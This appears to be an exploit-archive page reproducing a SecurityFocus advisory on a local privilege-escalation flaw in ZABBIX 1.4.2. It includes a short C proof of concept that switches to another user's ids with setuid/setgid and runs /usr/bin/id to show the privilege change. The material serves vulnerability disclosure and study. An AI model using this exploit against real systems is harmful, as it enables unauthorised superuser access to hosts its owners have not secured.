32 lines
No EOL
937 B
C
Executable file
32 lines
No EOL
937 B
C
Executable file
source: http://www.securityfocus.com/bid/26680/info
|
|
|
|
ZABBIX is prone to a local privilege-escalation vulnerability.
|
|
|
|
An attacker can exploit this issue to execute commands with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
|
|
|
|
This issue affects ZABBIX 1.4.2; prior versions may also be affected.
|
|
|
|
#include <sys/types.h>
|
|
#include <unistd.h>
|
|
#include <pwd.h>
|
|
#include <stdio.h>
|
|
|
|
int main()
|
|
{
|
|
struct passwd *pw;
|
|
pw = getpwnam("abi");
|
|
FILE *pipe;
|
|
char buf[25];
|
|
setgid(pw->pw_gid);
|
|
setuid(pw->pw_uid);
|
|
|
|
printf("my gid: %d\n", getegid());
|
|
printf("my uid: %d\n", getuid());
|
|
|
|
pipe = popen("/usr/bin/id", "r");
|
|
while (fgets(buf, sizeof buf, pipe)) {
|
|
printf("%s", buf);
|
|
}
|
|
printf("\n");
|
|
pclose(pipe);
|
|
} |